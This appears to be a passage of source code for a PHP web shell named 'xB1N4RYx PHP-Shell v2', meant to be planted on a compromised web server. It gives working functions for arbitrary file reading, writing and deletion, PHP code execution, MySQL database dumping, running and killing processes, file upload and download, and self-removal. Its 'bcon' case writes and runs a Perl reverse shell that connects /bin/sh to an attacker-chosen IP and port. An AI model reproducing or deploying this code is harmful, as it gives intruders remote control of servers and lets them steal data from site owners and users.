';
echo '
';
echo '
';
echo '';
break;
case "view":
$file = $_GET['file'];
$fc = $_GET['fc'];
if(!isset($fc)){ $fc = 0; }
if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $images, true) && $fc != 1){ echo '
Viewing Image
[ '.$file.' ]
'; break; }
if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $movies, true) && $fc != 1){ echo '
'; break; }
$fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$file), "r");
$fr = @fread($fo, filesize(realpath($_SESSION["current_folder"].$cslash.$file)));
echo '
';
fclose($fo);
break;
case "saveedit":
$fs = $_POST['file'];
$fd = $_POST['ctext'];
if (get_magic_quotes_gpc()){
if (!function_exists("strips")){
function strips(&$arr,$k=""){
if (is_array($arr)){
foreach($arr as $k=>$v){
if (strtoupper($k) != "GLOBALS"){
strips($arr["$k"]);
}
}
}
else{
$arr = stripslashes($arr);
}
}
}
strips($GLOBALS);
}
$fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "w");
$fo2 = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "r");
$fw = @fwrite($fo, $fd);
$fr = @fread($fo2, filesize(realpath($_SESSION["current_folder"].$cslash.$fs)));
echo '
';
fclose($fo);
fclose($fo2);
break;
case "highlight":
$fil = $_GET['file'];
$filz = realpath($_SESSION["current_folder"].$cslash.$fil);
echo '
';
echo '';
echo 'Highlighting '.realpath($_SESSION["current_folder"].$cslash.$fil).'
Edit';
echo ' |
';
echo '| ';
$hl = highlight_file($filz, true);
echo $hl;
echo ' |
';
break;
case "logout":
session_destroy();
echo '';
break;
case "mylogout":
unset($_SESSION['mhost']);
unset($_SESSION['mport']);
unset($_SESSION['muser']);
unset($_SESSION['mpass']);
unset($_SESSION['mlog']);
echo '';
break;
case "go":
$goto = $_GET['goto'];
if(!isset($goto)){
echo '
';
}
else{
$_SESSION["current_folder"] = $goto;
echo '';
}
break;
case "cf":
$ff = $_POST['fc'];
$f = realpath($_SESSION['current_folder'])."/".$ff;
echo '
';
if(isset($ff)){
if(file_exists($f)){ echo 'File Already Exists!'; }
else{
echo 'Done!';
$fo = @fopen($f, "w");
fwrite($fo, "File Created By xB1N4RYx PHP-Shell v2");
fclose($fo);
}
}
echo '
Create File';
echo '';
echo '';
break;
case "df":
$ff = $_GET['f'];
$f = realpath($_SESSION['current_folder'])."/".$ff;
echo '
';
if(isset($ff)){
if(file_exists($f)){
unlink($f);
echo 'Done!';
}
else{
echo 'File Doesnt Exist!';
}
}
echo '
Delete File';
echo '';
echo '';
if(!isset($_GET['noredirect']))
echo '';
break;
case "cfo":
$ff = $_POST['fco'];
$f = realpath($_SESSION['current_folder'])."/".$ff;
echo '
';
if(isset($ff)){
if(file_exists($f)){ echo 'Folder Already Exists!'; }
else{
echo 'Done!';
mkdir($f, 0777);
}
}
echo '
Create Folder';
echo '';
echo '';
break;
case "dfo":
$ff = $_GET['f'];
$f = realpath($_SESSION['current_folder'])."/".$ff;
echo '
';
if(isset($ff)){
if(!file_exists($f)){ echo 'Folder Doesnt Exist!'; }
else{
echo 'Done!';
rmdir($f);
}
}
echo '';
break;
case "php":
$phpc = $_POST['phpc'];
echo 'PHP Code Execution
Result
';
echo '
';
echo '';
break;
case "mysql":
$host = $_POST['host'];
$port = $_POST['port'];
$user = $_POST['user'];
$pass = $_POST['pass'];
if(!isset($_SESSION['muser'])){
echo '';}
// else{
if(isset($user)){
$_SESSION['mhost'] = $host;
$_SESSION['mport'] = $port;
$_SESSION['muser'] = $user;
$_SESSION['mpass'] = $pass;}
if(isset($_SESSION['muser'])){
$l = mysql_connect($_SESSION['mhost'].":".$_SESSION['mport'], $_SESSION['muser'], $_SESSION['mpass']);
if(!$l){
unset($_SESSION['mhost']);
unset($_SESSION['mport']);
unset($_SESSION['muser']);
unset($_SESSION['mpass']);
unset($_SESSION['mlog']);
die("Can't Connect To MySQL");
}
if($_SESSION['mlog'] < 1)
echo '';
$_SESSION['mlog'] = 1;
}
// }
if(isset($_SESSION['muser'])){
//if(!isset($_GET['db']) && isset($_POST['user'])){
$dbs = mysql_query("SHOW DATABASES");
echo 'Databases:
';
echo '';
echo ' | ';
switch($_GET['a'])
{
default:
echo '
';
break;
case "tables":
$db = $_GET['db'];
echo 'Tables of '.$_GET['db'].'
';
$t = mysql_query("SHOW TABLES FROM ".$_GET['db']);
while($tb = mysql_fetch_row($t)){
echo ''.$tb[0].'
';
}
break;
case "columns":
echo 'Data of '.$_GET['table']." @ ".$_GET['db'].'
';
echo '';
$db = $_GET['db'];
$t = $_GET['table'];
mysql_select_db($db, $l);
$c = mysql_query("SHOW COLUMNS FROM ".$t);
while($cc = mysql_fetch_array($c)){
echo '| '.$cc[0].' | ';
}
echo ' ';
$d = mysql_query("SELECT * FROM ".$t);
while($dd = mysql_fetch_array($d)){
echo ' ';
for($i = 0; $i <= count($dd)/2-1; $i++){
echo '| '.$dd[$i].' | ';
//echo '';
}
echo ' ';
}
echo '';
echo '
';
break;
case "query":
$db = $_POST['pdb'];
if(!isset($db))
$db = $_GET['db'];
$q = $_POST['query'];
if(isset($db))
echo 'Execute Query In '.$db.'
';
if(isset($q)){
mysql_select_db($db, $l);
mysql_query(stripslashes($q));
echo 'Done!';
}
echo '';
break;
}
echo ' |
';
}
break;
case "ktask":
$f = $_GET['f'];
$win = binary_shell("taskkill /F /IM ".$f);
$gpid = binary_shell("pidof ".$f);
$linux = binary_shell("kill -9 ".$gpid);
if(isset($win))
echo "".$win."";
else
echo "".$linux."";
break;
case "stask":
$f = $_GET['f'];
$folder = realpath($_SESSION['current_folder'])."/";
$win = binary_shell("cd ".$folder." && ".$f);
$linux = binary_shell("cd ".$folder." && "."./".$f);
if(isset($win))
echo "".$win."";
else
echo "".$linux."";
break;
case "downloadfile":
$f = $_GET['f'];
$file = realpath($_SESSION['current_folder'])."/".$f;
if (file_exists($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.$f);
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
ob_clean();
flush();
readfile($file);
exit;
/*header('Content-disposition: attachment; filename='.$f.'');
header('Content-type: application/octet-stream');
ob_clean();
flush();
readfile($file);*/
}
break;
case "downloadzip":
//echo '';
$f = $_GET['f'];
$file = realpath($_SESSION['current_folder'])."/".$f;
$fi = realpath("./".$f.'.zip');
compress($file, $f.'.zip');
header('Content-Description: File Transfer');
header('Content-Type: application/zip');
header('Content-Disposition: attachment; filename='.$f.'.zip');
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($fi));
ob_clean();
flush();
readfile($fi);
exit;
break;
case "upload":
echo '';
break;
case "dupload":
$up = realpath($_POST['to'])."/".basename($_FILES['f']['name']);
if(move_uploaded_file($_FILES['f']['tmp_name'], $up))
echo "Upload Successful!";
else
echo "Upload Unsuccessful! :(";
break;
case "sr":
echo 'Do you really want to remove this shell?';
break;
case "selfremove":
unlink($_SERVER['SCRIPT_FILENAME']);
echo '';
break;
case "viewimage":
$i = $_GET['i'];
$v = realpath($_SESSION['current_folder']).$cslash.$i;
/*echo $v;
echo '';
echo '
';
echo '';*/
header("Content-type: image/png");
ob_clean();
flush();
readfile($v);
break;
case "viewmovie":
$i = $_GET['i'];
$v = realpath($_SESSION['current_folder']).$cslash.$i;
header("Content-type: video/quicktime");
ob_clean();
flush();
readfile($v);
break;
case "bcon":
echo '';
echo '';
echo '
';
if(isset($_GET['ip']) && isset($_GET['port'])){
$ip = $_GET['ip'];
$port = $_GET['port'];
$bc = fopen("/tmp/bxcon.pl","w");
fwrite($bc,'#!/usr/bin/perl
use Socket;
$iaddr=inet_aton("'.$ip.'") || die("Error: $!\n");
$paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n");
$proto=getprotobyname("tcp");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("/bin/sh -i");
close(STDIN);
close(STDOUT);
close(STDERR);');
fclose($bc);
shell_exec("perl /tmp/bxcon.pl");
unlink("/tmp/bxcon.pl");
}
break;
}
echo '